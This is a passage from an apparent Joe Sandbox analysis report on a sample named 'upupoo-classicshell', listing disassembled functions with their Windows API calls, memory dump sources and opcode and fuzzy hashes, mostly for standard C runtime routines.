                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1036877536-0
                                                                                                              • Opcode ID: ace672a97ed4c0fa7cffafdca87237a441724fbd2c9da2f75922482c0f7fd9bc
                                                                                                              • Instruction ID: fd2fa88911dd0db4f2864ac5c6d8752dd7b2de48414999dcb17b675285aa49f5
                                                                                                              • Opcode Fuzzy Hash: ace672a97ed4c0fa7cffafdca87237a441724fbd2c9da2f75922482c0f7fd9bc
                                                                                                              • Instruction Fuzzy Hash: CCA15532E143869FE711CFE8C890BAEBBE5FF16394F14466DD5949B282C33A8945C790
                                                                                                              Function 1000A1CE Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 1000A21B
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1000A2A4
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1000A2B6
                                                                                                              • __freea.LIBCMT ref: 1000A2BF
                                                                                                                • Part of subcall function 10007DA2: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,1000A5BB,00000001,00000000,?,10009255,00000001,00000004,00000000,00000001,?,?,10007A89), ref: 10007DD4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 573072132-0
                                                                                                              • Opcode ID: df4c76b02d548afcb3c0c77d181b4347e642e21d7e60777293d7ddb1a1d3d176
                                                                                                              • Instruction ID: 625dfa77723734badbe6963b8029dbf71b678b19bca523b8492cc54dacefc02f
                                                                                                              • Opcode Fuzzy Hash: df4c76b02d548afcb3c0c77d181b4347e642e21d7e60777293d7ddb1a1d3d176
                                                                                                              • Instruction Fuzzy Hash: 3C318032A1021AABEB15CF68CC41EEF3BA5EB45790B114269FC14D7159EB36DD90CBA0
                                                                                                              Function 6E0B4892 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D), ref: 6E0B48DF
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000001,00000000,00000001,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D), ref: 6E0B4968
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,6E0B186A,?,?,?,6E0B186A,00000001,?,?,00000001,?,6E0B199D,?,00000001), ref: 6E0B497A
                                                                                                              • __freea.LIBCMT ref: 6E0B4983
                                                                                                                • Part of subcall function 6E0B0F23: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6E0B6A46,00000001,00000000,?,6E0B3B91,00000001,00000004,00000000,00000001,?,?,6E0B0869), ref: 6E0B0F55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 573072132-0
                                                                                                              • Opcode ID: 5886c3c8b138d9306d2626d6179a46040f6ea1c0a07f1d83ac5cdc9a625c14e0
                                                                                                              • Instruction ID: 5f9886c560ff4a05d9be38064fea9fca6f4ccee3849adce6febc1b2a49255d20
                                                                                                              • Opcode Fuzzy Hash: 5886c3c8b138d9306d2626d6179a46040f6ea1c0a07f1d83ac5cdc9a625c14e0
                                                                                                              • Instruction Fuzzy Hash: 0E31B371A1020AABDF258FE9CC94EEE7BA9FF41754F004528ED14D7240E736CA52CB90
                                                                                                              Function 00C2E6C8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C2E6FC
                                                                                                              • __isleadbyte_l.LIBCMT ref: 00C2E730
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00C262BE,?,00000000,00000000,?,?,?,00C262BE), ref: 00C2E761
                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00C262BE,00000001,00000000,00000000,?,?,?,00C262BE), ref: 00C2E7CF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                              • String ID:
                                                                                                              • API String ID: 3058430110-0
                                                                                                              • Opcode ID: ca50fc04415bf42db9f7e1ac18851102d480e63bb888b60434da87157843e1cd
                                                                                                              • Instruction ID: 33a1a8c3a8ec6501d27d38f8ce894ee1cd83b2bc220385422179b8849793464d
                                                                                                              • Opcode Fuzzy Hash: ca50fc04415bf42db9f7e1ac18851102d480e63bb888b60434da87157843e1cd
                                                                                                              • Instruction Fuzzy Hash: 0B31E331A102B9EFDB20DF68E884AAE3BB5FF01311F144569F465AB591D730DE40DB50
                                                                                                              Function 00C21690 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00C216C6
                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 00C216CD
                                                                                                                • Part of subcall function 00C2483E: GetProcessHeap.KERNEL32(00000000,0000000D,?,00C2133E), ref: 00C247BF
                                                                                                                • Part of subcall function 00C2483E: HeapAlloc.KERNEL32(00000000,?,00C2133E), ref: 00C247C6
                                                                                                              • SetLastError.KERNEL32(0000000E), ref: 00C216E7
                                                                                                                • Part of subcall function 00C214B0: RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00C214C2
                                                                                                                • Part of subcall function 00C214B0: GetCurrentThreadId.KERNEL32 ref: 00C214DC
                                                                                                                • Part of subcall function 00C214B0: EnterCriticalSection.KERNEL32(?), ref: 00C214E9
                                                                                                                • Part of subcall function 00C214B0: LeaveCriticalSection.KERNEL32(?), ref: 00C214F9
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00C20000,?), ref: 00C21763
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalCurrentHeapProcessSection$AllocCacheCreateEnterErrorExceptionFlushInstructionLastLeaveRaiseThreadWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3956295412-0
                                                                                                              • Opcode ID: 9c8428e16da943246a02e084355003deb1c6757f480767fdfad0742a9c7932cf
                                                                                                              • Instruction ID: 8eb6e2fc248ba9508e9dd3ab79a28a5539ad2cb726d3535a59c73e95fa3774d1
                                                                                                              • Opcode Fuzzy Hash: 9c8428e16da943246a02e084355003deb1c6757f480767fdfad0742a9c7932cf
                                                                                                              • Instruction Fuzzy Hash: F82191726143209FD320DF68EC48F6BBBE8EFD9720F098619B44597650D670ED00C7A0
                                                                                                              Function 1000853C Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId), ref: 1000856E
                                                                                                              • GetLastError.KERNEL32(?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId,10010160,GetCurrentPackageId,00000000), ref: 1000857A
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,100084E3,?,00000001,00000000,?,?,100088BA,00000008,GetCurrentPackageId,10010160,GetCurrentPackageId,00000000), ref: 10008588
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 3147098e497c188db1c0bef3813655e6f48d50d9fb082d9e089ebdc3b860c1d4
                                                                                                              • Instruction ID: ad19a021841b83601cc3559107faeef2263c3a75af5878e4aad8e7fe4077914c
                                                                                                              • Opcode Fuzzy Hash: 3147098e497c188db1c0bef3813655e6f48d50d9fb082d9e089ebdc3b860c1d4
                                                                                                              • Instruction Fuzzy Hash: 4401F732651B36ABF3218B688C84A5637D8FF05BE2B214624FD8AD3149D720DE00C7E0
                                                                                                              Function 6E0B2E9F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId), ref: 6E0B2ED1
                                                                                                              • GetLastError.KERNEL32(?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId,6E0BE740,6E0BE748,00000000), ref: 6E0B2EDD
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6E0B2E46,?,00000001,00000000,?,?,6E0B3277,00000008,GetCurrentPackageId,6E0BE740,6E0BE748,00000000), ref: 6E0B2EEB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 8bf1dd9d78e109f3f3fe177d8388907534114fd78098e7b450b13941a9b317dd
                                                                                                              • Instruction ID: 772cc28be1e44efe0f6ea48b97c9088a12a1489a979b2288500c588978e62ad1
                                                                                                              • Opcode Fuzzy Hash: 8bf1dd9d78e109f3f3fe177d8388907534114fd78098e7b450b13941a9b317dd
                                                                                                              • Instruction Fuzzy Hash: 7201D8326656279FDB2149E98C48B9A3BE8BF077E17500620F915F7145D732D401CAE0
                                                                                                              Function 00C2BA66 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                              • String ID:
                                                                                                              • API String ID: 3016257755-0
                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction ID: 8ba0b0d31567f82db08017f06ec0dcb46c8e024582591cea154f109f42e6b5e5
                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                              • Instruction Fuzzy Hash: EF114B3640025AFBCF12AE84EC41CEE3F36BB18350B598415FA2859431D736CAB1BB81
                                                                                                              Function 10003540 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b5699ec8b926b1eefa472988cf25bd7a939d6487a8a13951325e647237b095f9
                                                                                                              • Instruction ID: ca7e052b1ba0c9c4c3730bec87bbebe04897cc60a9114423253c0b1f866b3849
                                                                                                              • Opcode Fuzzy Hash: b5699ec8b926b1eefa472988cf25bd7a939d6487a8a13951325e647237b095f9
                                                                                                              • Instruction Fuzzy Hash: 56F0E9B6600A4186F606D7B05C4771F73CCCF182D6714C53AB515C626EFA20F9904112
                                                                                                              Function 10003780 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd62ddbaf80aae36ed7577443f6e8972de364772f40cbdcce04eebe1cf8f76c0
                                                                                                              • Instruction ID: 2bc1ed8948dd11c028fdbd2976b362d9ff0f370919dcc049d9fdb9bef8b76392
                                                                                                              • Opcode Fuzzy Hash: fd62ddbaf80aae36ed7577443f6e8972de364772f40cbdcce04eebe1cf8f76c0
                                                                                                              • Instruction Fuzzy Hash: CCF02EF52082064AB626D7B68882A1F73DCCF242D0B00C03AF50AC6A0EEF26F9548213
                                                                                                              Function 00C272F6 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C27302
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C27319
                                                                                                              • __amsg_exit.LIBCMT ref: 00C27327
                                                                                                              • __lock.LIBCMT ref: 00C27337
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3521780317-0
                                                                                                              • Opcode ID: 885364bd792298115c90683597f77fbe93a0aa0b03f9a78bd74e4bbc40c8571c
                                                                                                              • Instruction ID: 30e8b810ac944e3e946244e84bc00420081af9aeca41bc74a3739b1f80710302
                                                                                                              • Opcode Fuzzy Hash: 885364bd792298115c90683597f77fbe93a0aa0b03f9a78bd74e4bbc40c8571c
                                                                                                              • Instruction Fuzzy Hash: CEF06D32918730DAD720FBB5A44674D72A0AB04B20F804319B85067EE1CBB09D01BBE1
                                                                                                              Function 6E0B9938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DecodePointer.KERNEL32(?,E644DAF2,?,?,?,6E0BA854,000000FF), ref: 6E0B9996
                                                                                                              • _free.LIBCMT ref: 6E0B99EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DecodePointer_free
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 4139015823-1018135373
                                                                                                              • Opcode ID: 86460f81e8f7b33ae7e2392f6e40a3423c929cd43f0efd8617f2920aa2809df5
                                                                                                              • Instruction ID: fc39df1d26d0b7cccb86501ccac950b699f31949c84d9f692d47ddfe3a85bc7e
                                                                                                              • Opcode Fuzzy Hash: 86460f81e8f7b33ae7e2392f6e40a3423c929cd43f0efd8617f2920aa2809df5
                                                                                                              • Instruction Fuzzy Hash: 5E21D1306086069FCB848FADC491B29F7F9FF69354FA0466ED818C7A50DB33E880C691
                                                                                                              Function 00C284F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00C25409: __getptd.LIBCMT ref: 00C2540F
                                                                                                                • Part of subcall function 00C25409: __getptd.LIBCMT ref: 00C2541F
                                                                                                              • __getptd.LIBCMT ref: 00C284FF
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __getptd.LIBCMT ref: 00C2850D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 803148776-1018135373
                                                                                                              • Opcode ID: 4521c732f766405099f729543eae05594cdd36b80caffd05d5a59de3f7b837f3
                                                                                                              • Instruction ID: d38ba7914f524ab1586a449f3af0918bbabc1642ee79968242ec54b56ea474a4
                                                                                                              • Opcode Fuzzy Hash: 4521c732f766405099f729543eae05594cdd36b80caffd05d5a59de3f7b837f3
                                                                                                              • Instruction Fuzzy Hash: CC01AD708427348EEF34DF24E4846ADB3B5AF14311F68443DE06056E91CF70DA89EB40
                                                                                                              Function 10003AB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003AC2
                                                                                                                • Part of subcall function 10003A1A: std::exception::exception.LIBCONCRT ref: 10003A27
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10003AD0
                                                                                                                • Part of subcall function 10005C09: RaiseException.KERNEL32(?,?,10003AB5,?,?,?,?,?,?,?,?,10003AB5,?,100145E8,?), ref: 10005C68
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                              • String ID: Unknown exception
                                                                                                              • API String ID: 1586462112-410509341
                                                                                                              • Opcode ID: 801ff25c5d3337979eb9110eee663fe8bc6d9128113f372e7bce354b8a41f0ce
                                                                                                              • Instruction ID: 147b7ee66f7c361aedf73fb6b590e46a3607ab3a88595bb1c318a0805976edb4
                                                                                                              • Opcode Fuzzy Hash: 801ff25c5d3337979eb9110eee663fe8bc6d9128113f372e7bce354b8a41f0ce
                                                                                                              • Instruction Fuzzy Hash: 46D0A738A00108BBEB00EAA4C801ECE77BCFF051C4F908464B594D705AFB76E50586C2
                                                                                                              Function 00C24CC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog3.LIBCMT ref: 00C24CC8
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00C24CF3
                                                                                                                • Part of subcall function 00C24F9F: RaiseException.KERNEL32(?,?,00C26041,?,?,?,?,?,00C26041,?,00C36020,00C3A010,?,00C22FE3,?), ref: 00C24FE1
                                                                                                              Strings
                                                                                                              • invalid string position, xrefs: 00C24CCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
